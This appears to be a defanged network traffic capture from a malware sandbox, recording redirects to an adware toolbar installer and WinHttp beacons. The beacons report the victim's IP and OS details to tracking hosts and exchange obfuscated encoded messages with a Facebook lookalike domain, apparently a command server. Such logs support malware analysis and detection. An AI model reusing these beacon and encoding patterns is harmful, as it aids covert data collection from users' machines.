Set-Cookie: sid=vK37VRG0YSdzkOs5qTRdA9Z14UJ6QEFEq3sJkZYFAp6btXDsM0tytg==; domain=.lxudv.com; path=/; HttpOnly

Set-Cookie: trk=dp 7peOVS71x3OA61HaNPNZ14UJ6QEFEq3sJkZYFAp6btXDsM0tytg==; domain=.lxudv.com; expires=Thu, 02-Dec-2021 18:04:14 GMT; path=/; HttpOnly

Set-Cookie: c38465=vK37VRG0YSdCxOfZKuiWlcPLj5T5gYhupmXc7hJQzpwdFAkm5pFJoNMevdOkv9Ra; domain=.lxudv.com; expires=Sun, 01-Jan-2017 18:04:14 GMT; path=/; HttpOnly

Date: Fri, 02 Dec 2016 18:04:14 GMT

Content-Length: 159
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://free.
mytransitguide.com/index.jhtml">here</a>.</h2>..</bo
dy></html>..HTTP/1.1 302 Found..Cache-Control: private..Conte
nt-Type: text/html; charset=utf-8..Location: hXXp://free.mytransitguid
e.com/index.jhtml..Server: Microsoft-IIS/8.0..p3p: CP="IDC DSP COR ADM
 DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"..Set-Cookie: sid=vK
37VRG0YSdzkOs5qTRdA9Z14UJ6QEFEq3sJkZYFAp6btXDsM0tytg==; domain=.lxudv.
com; path=/; HttpOnly..Set-Cookie: trk=dp 7peOVS71x3OA61HaNPNZ14UJ6QEF
Eq3sJkZYFAp6btXDsM0tytg==; domain=.lxudv.com; expires=Thu, 02-Dec-2021
 18:04:14 GMT; path=/; HttpOnly..Set-Cookie: c38465=vK37VRG0YSdCxOfZKu
iWlcPLj5T5gYhupmXc7hJQzpwdFAkm5pFJoNMevdOkv9Ra; domain=.lxudv.com; exp
ires=Sun, 01-Jan-2017 18:04:14 GMT; path=/; HttpOnly..Date: Fri, 02 De
c 2016 18:04:14 GMT..Content-Length: 159..<html><head><
title>Object moved</title></head><body>..<h2&g
t;Object moved to <a href="hXXp://free.mytransitguide.com/index.jht
ml">here</a>.</h2>..</body></html>....<<< skipped >>>

GET / HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: bus.ad-jump.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/html

Last-Modified: Fri, 11 Nov 2016 14:41:43 GMT

Accept-Ranges: bytes

ETag: "26eafb8293cd21:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Date: Fri, 02 Dec 2016 18:04:29 GMT

Content-Length: 87
<script>window.location.href='hXXp://lxudv.com/?a=539528&c=14309
92&m=32&s1=17'</script>HTTP/1.1 200 OK..Content-Type: text/html.
.Last-Modified: Fri, 11 Nov 2016 14:41:43 GMT..Accept-Ranges: bytes..E
Tag: "26eafb8293cd21:0"..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.
NET..Date: Fri, 02 Dec 2016 18:04:29 GMT..Content-Length: 87..<scri
pt>window.location.href='hXXp://lxudv.com/?a=539528&c=1430992&m=32&
s1=17'</script>..

GET /installError.jhtml?errorType=browser&errorCode=blockedCountry HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: free.mytransitguide.com

Connection: Keep-Alive

Cookie: sessionData="tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh SiFsGi4NGkw7ePy/oKNZPpTwCEs b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB un Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz /U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="; anx="u=355A1458-B606-4CD6-A42E-AB2595CB700B&fv=1480701872700&lv=1480701872936&nv=3&t=-&v=-&p=-&si=-&sn=dubprdsndlbfe47.dub.jabodo.com&od=bus.ad-jump.com&op=-&ok=-&om=referral&ob=-&oc=-&os=-&w=1276&h=846&cd=24&f=10.0&g=-&xlang=en&xrp=^BNH^orgyyy^S18590^ua&xrt=S18590&xuer=1&xgc=false&xrco=BNH&xrca=orgyyy&xrcc=ua&tbGuid=75357AF2-6820-49C9-86BD-ECF2
HTTP/1.1 200 OK

Date: Fri, 02 Dec 2016 18:04:34 GMT

Server: Apache-Coyote/1.1

P3P: CP='CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'

Expires: -1

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Pragma: no-cache

Content-Encoding: gzip

Vary: Accept-Encoding

Content-Type: text/html;charset=UTF-8

Content-Language: en-UA

Set-Cookie: sessionData="eM8hGio79AhShEic3iyflDqBDEWs0qHfCkXaLgses0EUAUJbWMthbxKLdhWjWIIab9HzKn44fQ916lYP0279s20CXp3Rsg/8xJ9cRob2SskrlqFVgWLktLXejfDjgTlT5YmMQwFlCvR5hn6iYMaMPc1dxuGAS 5Ao5rbmI4gWGbIjR 6rqjrOAK32B56/RuC3XwasduDL4T jqwXu6dF2l5yP6Eh0f PwQ8lXGEDaf7r8WP7z4uyjeW3BC0l3kswI6qbLTs5/lcidHLJAKWvAMzBuHgzE5peSufxGV90jebaNwsedd32MQE6Ck2T7xP 91B2By gwEyvKWzDA/E2W Ojq92fB FumE956LuEhkV qiV/RoSReyMIYDxTSkY8/v1OpT7cPdbRSIod021Qb0mWGKtM0vyOHoxhBIQEEg C3iwJLP9YSZJQeEfgbhz0FLxAdngNpUhWbeE2b8je57uV2/1/tIuwylfrHPbmDV5 3fS3XUQelnSXbPWzhWi8GdLujYquTTo2rTcOUb7xgHSuS01HIsgljjb81sxDNZwhHwyt6G11P/w8p7TBzVF0US6fQCPhiTZExtvxTlEdb/8sOrsKcoH44jUVfceuIk7yD eRgFmevaj6FdxyGN5T1hlBsYx/48i826ekoWEemVZSr8Q43rYgMr45fDpql00Dxs2oWgZKYdwFfhAcl LL6/Fj 8 Lso3ltwQtJd5LMHiBB/h2mUKKHQJJcdB 8c8wb4GeTgH1cYnCpMOrZUDjAcPLZMQv67 j5iRm29uBhA=="; Version=1; Domain=.mytransitguide.com; Path=/

Set-Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_UA; Path=/

Set-Cookie: anx="u=355A1458-B606-4CD6-A42E-AB2595CB700B&fv=1480701872700&lv=1480701874788&nv=4&t=-&v=-&p=-&si=-&sn=dubprdsndlbfe47.dub.jabodo.com&od=bus.ad-jump.com&op=-&ok=-&om=referral&ob=-&oc=-&os=-&w=1276&h=846&cd=24&f=10.0&g=-&xlang=en&xrp=^BNH^orgyyy^S18590^ua&xrt=S18590&xuer=1&xgc=false&xrco=BNH&xrca=orgyyy&xrcc=ua&tbGuid=52828238-BE93-4D94-9335-3B9A33ECAE88&xh=8681&xi=MSNI&xtp=vhigh&xp=vicinio&xtt=template_new&xpp=^BNH^orgyyy^S18590^ua&xs=29954&xt=intdefault&xcid=3121b0a55fdb4060b313a5cb88f90289&xx=install&xracl=&xckoid=&xgds=&xad=&xmvte=&xit=&xmvtv=&xmvtt=&xckid=&xrm=&xrs=&xnt=&xriad=&xft=&xrkw=&surveyUrl=&xkw=&xct=&xiad=&xbkw=&xg=&xn=&xu="; Version=1; Domain=.mytransitguide.com; Max-Age=7776000; Expires=Thu, 02-Mar-2017 18:04:34 GMT; Path=/

Via: 1.1 VVV.mapsgalaxy.com

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked
a..............2000.....z... .[y.....oHY$ER..DOdI..{....'y...i.A..&..n
..G...."....ph..$%..O.H.b.P(..........W......G..}v.F..ggo..<=b...._
7..../...^\.z.......I..^0q...._ .2........u.z......o.o.V......(.tc....
&.7c..us..wwwE..f....e..'...X....2.. .....-.y.H......*.~..2 ...). ....
|...........C..m.....n.(..|.7.n......[..M....g...F<....n..l.6.&...&
lt;v.......N..g.M.1.V......b.x.....0....b..8.xy..$...`]|(*.. .o}.b@N.4
.".A...._.......#.~....".../...kMo.E..q]oriF...=..Lo.a.9~........Sg.0|
#..7..w...A....d0.B.ge............ ......l.jV$"...Y.(X...8.K>......
|..3...G.\!..l..;..A.{.ze.o.......&P.2..LH.Do8.w.4.@..P&.W<.....=6.
\.O4L.h......i.....j..?...h..t.}....A.....D..&..h#......UL..S.........
H....eQ......Sft...'......f..........{EQ.....$.G....#.."B.hH{ iI..y...
Z#........8.......%.gq.L.:s!....O^]...x5..vRG.s..]1.@3...?.}...e...l`.
.B.[.g..E0=B...].M.....l(oI>........h..........eN.St......XE... ..|
.n......}N%r.k.D........j.Z._....[.[..l.z...0...*...3...CL....io=@9c..
4h.A.{...A.;.8MgG.pF...p.{..............;.-...)(......w.v......K~I...&
.....Qe.k,QR.J..M..........i....za..#).........3..V .6..&.....0.~hH...
9uB..cs.......]}.......B.~...v3..0....&.D.....Sg......\U..q{..%c\/.>
;.....v.FX....d.U.#.*.. .Xa.D.....bX....pd.M..T6..o......W...(..,.6pj.
....`../EuM=..\...."....<.(04.54....-jix=......J..u.eu.0.<..*iQ?
..&..:Y.`}..,4LQ;>s"o ...J....rMj.B..C..i.'JV..3....-YP....7..Y&.K.
B.1C.kT.[\..ZS......s....(v|.:.X.4V....1C.L^.=.^..&-...|..|8."%..(..\.
 .GmO6.Z...m...S ....u.xn....L#..$..y.vz.x..k.b0.`.`0..M.<-....<<< skipped >>>

GET /favicon.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: free.mytransitguide.com

Connection: Keep-Alive

Cookie: sessionData="eM8hGio79AhShEic3iyflDqBDEWs0qHfCkXaLgses0EUAUJbWMthbxKLdhWjWIIab9HzKn44fQ916lYP0279s20CXp3Rsg/8xJ9cRob2SskrlqFVgWLktLXejfDjgTlT5YmMQwFlCvR5hn6iYMaMPc1dxuGAS 5Ao5rbmI4gWGbIjR 6rqjrOAK32B56/RuC3XwasduDL4T jqwXu6dF2l5yP6Eh0f PwQ8lXGEDaf7r8WP7z4uyjeW3BC0l3kswI6qbLTs5/lcidHLJAKWvAMzBuHgzE5peSufxGV90jebaNwsedd32MQE6Ck2T7xP 91B2By gwEyvKWzDA/E2W Ojq92fB FumE956LuEhkV qiV/RoSReyMIYDxTSkY8/v1OpT7cPdbRSIod021Qb0mWGKtM0vyOHoxhBIQEEg C3iwJLP9YSZJQeEfgbhz0FLxAdngNpUhWbeE2b8je57uV2/1/tIuwylfrHPbmDV5 3fS3XUQelnSXbPWzhWi8GdLujYquTTo2rTcOUb7xgHSuS01HIsgljjb81sxDNZwhHwyt6G11P/w8p7TBzVF0US6fQCPhiTZExtvxTlEdb/8sOrsKcoH44jUVfceuIk7yD eRgFmevaj6FdxyGN5T1hlBsYx/48i826ekoWEemVZSr8Q43rYgMr45fDpql00Dxs2oWgZKYdwFfhAcl LL6/Fj 8 Lso3ltwQtJd5LMHiBB/h2mUKKHQJJcdB 8c8wb4GeTgH1cYnCpMOrZUDjAcPLZMQv67 j5iRm29uBhA=="; anx="u=355A1458-B606-4CD6-A42E-AB2595CB700B&fv=1480701872700&lv=1480701874798&nv=5&t=-&v=-&p=-&si=-&sn=dubprdsndlbfe47.dub.jabodo.com&od=bus.ad-jump.com&op=-&ok=-&om=referral&ob=-&oc=-&os=-&w=1276&h=846&cd=24&f=10.0&g=-&xlang=en&xrp=^BNH^orgyyy^S18590^ua&xrt=S18590&xuer=1&xgc=false&xrco=BNH&xrca=orgyyy&xrcc=ua&tbGuid=52828238-BE93-4D94-9335-3B9A33ECAE88&xh=8681&xi=MSNI&xtp=vhigh&xp=vicinio&xtt=template_new&xpp=^BNH^orgyyy^S18590^ua&xs=29954&xt=intdefault&xcid=3121b0a55fdb4060b313a5cb88f90289&xx=
HTTP/1.1 200 OK

Date: Fri, 02 Dec 2016 18:04:35 GMT

Server: Apache-Coyote/1.1

Accept-Ranges: bytes

ETag: W/"894-1478816616000"

Last-Modified: Thu, 10 Nov 2016 22:23:36 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Content-Type: image/x-icon

Via: 1.1 VVV.mapsgalaxy.com

Keep-Alive: timeout=5, max=99

Connection: Keep-Alive

Transfer-Encoding: chunked

a..............e7..c``.B... )..... ......@!....8..sC0........DX.......
.~.......(u.._d.@..M?.Zv...DX...@.i...... ..b.....|......D@.....4.Q.G.
[..0. ..:.b2.z.-@)..H8...T..._....."...&'.........l.........z..,......
..10.930....@v..P.H......i?..7O...4.~.....0..

GET /images/vicinio/dsp-images/jeremy.jacinto/asset1_3/1471015421274.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ak.imgfarm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Fri, 12 Aug 2016 15:23:41 GMT

ETag: "67f289-2244-539e177aedfcc"

Accept-Ranges: bytes

Content-Length: 8772

Cache-Control: max-age=305673547

Expires: Mon, 10 Aug 2026 15:23:41 GMT

Content-Type: image/png

Date: Fri, 02 Dec 2016 18:04:34 GMT

Connection: keep-alive
.PNG........IHDR.......N.....vf......tEXtSoftware.Adobe ImageReadyq.e&
lt;...&iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:BC00057560A011E6846D
B5CE753C7B74" xmpMM:DocumentID="xmp.did:BC00057660A011E6846DB5CE753C7B
74"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BC00057360A011
E6846DB5CE753C7B74" stRef:documentID="xmp.did:BC00057460A011E6846DB5CE
753C7B74"/> </rdf:Description> </rdf:RDF> </x:xmpmet
a> <?xpacket end="r"?>........IDATx..]...eu>........... j.
`Bk1.Q.FK..)%....I4..j..-iE.kXt[.."`........ .@....h..,.........{g.t..
.s...{..o..M:...;w...}................D..(......g,A..i.x3......>R.?
.;....] ..m. v.i..h...s..>Z..q.J.[{.....s....'.G.k...?.._....J!f{..
.v.....oj..d..z.t.E.9.... .9.S..F3.9&..B.G.,...'.......o....; ...P.a.(
6...8.........kR..R)1M.)}..O....cKw.1.X.?t...ex..Mx...zO.__.J.y.E..,..
.#v.W...='.1...l.....(I......P{F.#.3..a.........e...............rO..!P
1qi3.m/.q......'-...l....<1:..<...,.@A%..-..@.ZL.3m<v.~i....r
%Xk. .......g..4V.....w...-.1..Q......._.yZ3......../.....^...G...<<< skipped >>>

GET /track_ch.php?ip=194.242.96.218&o=2 HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: rep.pe-wok.biz


HTTP/1.1 500 Internal Server Error

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Connection: keep-alive

Date: Fri, 02 Dec 2016 18:04:19 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Error from cloudfront

Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)

X-Amz-Cf-Id: hP4FNiZEn6x6FZlGnVDs12djjhnibAkbuOzugLbuWyie0a4we_x4KQ==

HTTP/1.1 500 Internal Server Error..Content-Type: text/html; charset=U
TF-8..Content-Length: 0..Connection: keep-alive..Date: Fri, 02 Dec 201
6 18:04:19 GMT..Server: Apache/2.2.15 (CentOS)..X-Powered-By: PHP/5.3.
3..X-Cache: Error from cloudfront..Via: 1.1 0f820adb6671fcc6033a9aa95e
c8e0fb.cloudfront.net (CloudFront)..X-Amz-Cf-Id: hP4FNiZEn6x6FZlGnVDs1
2djjhnibAkbuOzugLbuWyie0a4we_x4KQ==..

GET /api/report?type=1&code=Windows 7 Ultimate Edition Service Pack 1 x86 (Build:7601) | Internet Explorer 9.0.8112.16421 HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: my.pcmaps.net


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/8.5

X-AspNetMvc-Version: 5.2

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 02 Dec 2016 18:04:18 GMT

Content-Length: 15
{"status":true}....


GET /api/ip HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: my.pcmaps.net


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/8.5

X-AspNetMvc-Version: 5.2

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 02 Dec 2016 18:04:18 GMT

Content-Length: 14

194.242.96.218HTTP/1.1 200 OK..Cache-Control: private..Content-Type: t
ext/html; charset=utf-8..Server: Microsoft-IIS/8.5..X-AspNetMvc-Versio
n: 5.2..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Fri,
 02 Dec 2016 18:04:18 GMT..Content-Length: 14..194.242.96.218..

GET /s/roboto/v15/mnpfi9pxYH-Go5UiibESIj8E0i7KZn-EPnyo3HZu7kw.woff HTTP/1.1

Accept: */*

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://free.mytransitguide.com

Accept-Encoding: gzip, deflate

Host: fonts.gstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: font/woff

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

Date: Tue, 08 Nov 2016 05:57:10 GMT

Expires: Wed, 08 Nov 2017 05:57:10 GMT

Last-Modified: Wed, 14 Jan 2015 22:46:39 GMT

X-Content-Type-Options: nosniff

Server: sffe

Content-Length: 18572

X-XSS-Protection: 1; mode=block

Age: 2117244

Cache-Control: public, max-age=31536000
wOFF......H.......~.........................GPOS............B...GSUB..
.`...\.....&.ROS/2.......U...`....cmap...........8..!Zcvt .......Z...Z
...=fpgm.......=......c.gasp...X............glyf...d..6...a.:. .hdmx..
BX...d........head..B....6...6....hhea..B........$.]..hmtx..C....G...v
..8.loca..E\........Le3qmaxp..G.... ... ....name..G8.........D-/post..
G........ .m.dprep..G..........w83x.....dG.....Zq.b.v2Z .m.6.b.N......
o..F..^t....U...#i.&.z....5I[.w...k.....2.{.9._.#..f.Y%........_v..Wj.
..$'...`..6....'8.z ......^.W.....h'..^.....]...3..}...}.?.}..p....gx;
{......R...Vp?...^Gw..t..............l..a...v.N.Y.hW........:P..P..#..
QJW..4V.5A.5E'.T..3t...........@..#}.O..>...B_.{.....~..-.B-.b..J..
j.Q..T.5..,....qGtn...(j..).oR.v......e1.`E:........a2L.*.bu:.jt.<.
..........!|...'0..f.l..sa.....X..`1..U...@6../.. ...[..N....H.q..{...
...:.*t.5.. .....A..d.f.`.6..~..r]a..v.R..qz.>.#.:wF..c..T..Q4..B2.
I=....J.$vM:.~._a.L...B..]oE.l.. .2a2...`~.s......G...."X......'.]..C&
L.'`>,...........}..p.a..-c..V2.......W..W.^....y....~.i0..X... .2a
.]...Sms........X..`1...*X.k .......S.l.D.........9H\eX..:......jeAtG.
. ..|.b9:.....O..bN.Fn...iz.V...............'_.0g.?......a[b........./
WJ..].2|.......\..:....._.50.#.m.>.;q.!......Vg...4..b..f2..E..c...
0$4....Ld.4AVk9...{.U.h..i......f......o.!3....F......$K....l......2$.
(..W..f....-..........V1...."d...........?...L...5.8 I|.......h...g/..
...s.V.?)B.".h.....!......u.....J..2..Y.z...Z......#K.r....=......o}.Z
K.?1.\.._...$....y.=y....T..9)x.....*..ti..Q....&........y....m.5.<<< skipped >>>

GET /api//send HTTP/1.1

Connection: Keep-Alive

Accept: */*

Referer: hXXp://VVV.facebook.com

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Server: 4LxnqLHLtLKLxnvnxnELyLWnUL2n2nOn7nPnOnDnDndnOn7nDn2nznELWnLL7nOnknGnWnOnWn7nDnLLGnGnPnHnELxnInxnOLhLGLKLxnvnHnInxndLKLPLxnvnxn0LsL2LtLHLzLDLSnknSn3LZLOLsL5LbLOLKLSnELtLsLOLsLHL2LSnfLKLPLdLsLqLKLSnoLbLqL7LSnHnSnvLdnOnSnRngLkLsLZLtLvnknOn2nHnQnxnInxnXLPLHLzLDLKLPLxnvnxnxnInxnkLDLKLPLxnvnxnxnInxnGLbLDLDLxnvnxnxnInxnqLHLHL7LsLKLDLxnvnxnxnInxnbLsLtLxnvn2nInxnkLOLhLGLKLxnvn2nFB

Server-Key: nFAUgy1ELwJ9ilj8BVoM6fT3r0CuapNcSexbXqtKRQYsI7Z52HGWPDOkdzvhm4

Host: api.faceboolad.com


HTTP/1.1 200 OK

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 326

Content-Type: text/plain; charset=gb2312

Expires: -1

Server: Microsoft-IIS/8.5

Server-Key: RLqfNxP7CmDZBTodkivt0WhncaMHe6yj21UsYE3IVXGzbS8JrK9g5pwuQFl4OA

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 02 Dec 2016 18:04:18 GMT

[CODE]RLqfNxP7CmDZBTodkivt0WhncaMHe6ykm8m5mdm5L8mwm8mhm8mwm8mQm8m5L8m5
mdmpLdmBmdm0mdm5mdmFL8m9L8m5L8m5L8mhm8mam8m9L8m5mdmpLdm5mdmQm8mVm8mDm8
mhm8mwm8m9L8mrLdmMm8mpm8mFL8mVm8mQm8mwm8m9L8mgm8m7m8mBm8mHm8mpm8mrLdmT
m8mhm8m5L8mwm8mrLdmwm8mCm8mFL8m9L8mrLdm5L8mQm8mMm8mMm8m9L8m5L8m5L8mgLd
m5mdmWmGmj21UsYE3IVXGzbS8JrK9g5pwuQFl4OA[CODE]HTTP/1.1 200 OK..Cache-C
ontrol: no-cache..Pragma: no-cache..Content-Length: 326..Content-Type:
 text/plain; charset=gb2312..Expires: -1..Server: Microsoft-IIS/8.5..S
erver-Key: RLqfNxP7CmDZBTodkivt0WhncaMHe6yj21UsYE3IVXGzbS8JrK9g5pwuQFl
4OA..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Fri, 02
 Dec 2016 18:04:18 GMT..[CODE]RLqfNxP7CmDZBTodkivt0WhncaMHe6ykm8m5mdm5
L8mwm8mhm8mwm8mQm8m5L8m5mdmpLdmBmdm0mdm5mdmFL8m9L8m5L8m5L8mhm8mam8m9L8
m5mdmpLdm5mdmQm8mVm8mDm8mhm8mwm8m9L8mrLdmMm8mpm8mFL8mVm8mQm8mwm8m9L8mg
m8m7m8mBm8mHm8mpm8mrLdmTm8mhm8m5L8mwm8mrLdmwm8mCm8mFL8m9L8mrLdm5L8mQm8
mMm8mMm8m9L8m5L8m5L8mgLdm5mdmWmGmj21UsYE3IVXGzbS8JrK9g5pwuQFl4OA[CODE]
....

GET /api//send HTTP/1.1

Connection: Keep-Alive

Accept: */*

Referer: hXXp://VVV.facebook.com

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Server: 1MpRgMkMjMuMpReRpRHM5M4RKMlRlRoRkRqRoRsRsR7RoRkRsRlR1RHM4RWMkRoRtRyR4RoR4RkRsRWMyRyRqRcRHMpR8RpReMZMoMuMpReRcR8RpRqMuMlMpReRpRCMmM8MjMkMsMcMfRtRfRPMyMeMmM4MEMeMuMfRHMjMmMeMmMkM8MfRvMuMlMqMmMgMuMfRzMEMgM2MfRcRfRQM7RoRfRORRMAMmMyMjMeRtRoRlRcR2RpR8RpRfMlMkMsMcMuMlMpReRpRpR8RpRAMcMuMlMpReRpRpR8RpRoMEMcMcMpReRpRpR8RpRgMkMkM2MmMuMcMpReRpRpR8RpREMmMjMpReRlR8RpRAMeMZMoMuMpReRlR5d

Server-Key: ND5RKaLWHUYMn6wrGJvdIzCxPV3Fb9iTBpgfEhXSuj2Om0k84ycltosqAe17ZQ

Host: api.faceboolad.com


HTTP/1.1 200 OK

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 326

Content-Type: text/plain; charset=gb2312

Expires: -1

Server: Microsoft-IIS/8.5

Server-Key: lCSEi1enLajNZ7Uyhpx5MHWBgzFO3cJ4rGs0q6IDvd2PYtV9koXKRmQfu8bwTA

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 02 Dec 2016 18:04:28 GMT

[CODE]lCSEi1enLajNZ7Uyhpx5MHWBgzFO3cJ0NyNeNLNcNyNwEyNRNyNwEyNuNyNcNyNe
NLNwELNjNLNbELNeNLN2NyNfNyNcNyNcNyNRNyNZNyNfNyNeNLNwELNeNLNuNyNkNyNdNy
NRNyNwEyNfNyNKELNXNyNBNyN2NyNkNyNuNyNwEyNfNyNjNyNONyNbEyNaNyNBNyNKELNV
NyNRNyNcNyNwEyNKELNwEyN3NyN2NyNfNyNKELNcNyNuNyNXNyNXNyNfNyNcNyNcNyNXNL
NeNLNxNQE4rGs0q6IDvd2PYtV9koXKRmQfu8bwTA[CODE]HTTP/1.1 200 OK..Cache-C
ontrol: no-cache..Pragma: no-cache..Content-Length: 326..Content-Type:
 text/plain; charset=gb2312..Expires: -1..Server: Microsoft-IIS/8.5..S
erver-Key: lCSEi1enLajNZ7Uyhpx5MHWBgzFO3cJ4rGs0q6IDvd2PYtV9koXKRmQfu8b
wTA..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Fri, 02
 Dec 2016 18:04:28 GMT..[CODE]lCSEi1enLajNZ7Uyhpx5MHWBgzFO3cJ0NyNeNLNc
NyNwEyNRNyNwEyNuNyNcNyNeNLNwELNjNLNbELNeNLN2NyNfNyNcNyNcNyNRNyNZNyNfNy
NeNLNwELNeNLNuNyNkNyNdNyNRNyNwEyNfNyNKELNXNyNBNyN2NyNkNyNuNyNwEyNfNyNj
NyNONyNbEyNaNyNBNyNKELNVNyNRNyNcNyNwEyNKELNwEyN3NyN2NyNfNyNKELNcNyNuNy
NXNyNXNyNfNyNcNyNcNyNXNLNeNLNxNQE4rGs0q6IDvd2PYtV9koXKRmQfu8bwTA[CODE]
....

GET /api//send HTTP/1.1

Connection: Keep-Alive

Accept: */*

Referer: hXXp://VVV.facebook.com

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Server: xsDB2shsUsQsDBHBDBZsNsWB9sOBOB7BhBcB7BRBRBmB7BhBRBOBxBZsWBeshB7BGBABWB7BWBhBRBesABABcBqBZsDBvBDBHsds7sQsDBHBqBvBDBcsQsOsDBHBDBLsVsvsUshsRsqsfBGBfBMsAsHsVsWsusHsQsfBZsUsVsHsVshsvsfB5sQsOscsVs2sQsfBysus2sJsfBqBfBksmB7BfBXBBs1sVsAsUsHBGB7BOBqBJBDBvBDBfsOshsRsqsQsOsDBHBDBDBvBDB1sqsQsOsDBHBDBDBvBDB7susqsqsDBHBDBDBvBDB2shshsJsVsQsqsDBHBDBDBvBDBusVsUsDBHBOBvBDB1sHsds7sQsDBHBOBN0

Server-Key: tlNB9zbeZ8pswrIKgj50SyL6MEFCnaiP3D2fu4ToQUJXVYhvWAqOG7Rc1Hxmdk

Host: api.faceboolad.com


HTTP/1.1 200 OK

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 326

Content-Type: text/plain; charset=gb2312

Expires: -1

Server: Microsoft-IIS/8.5

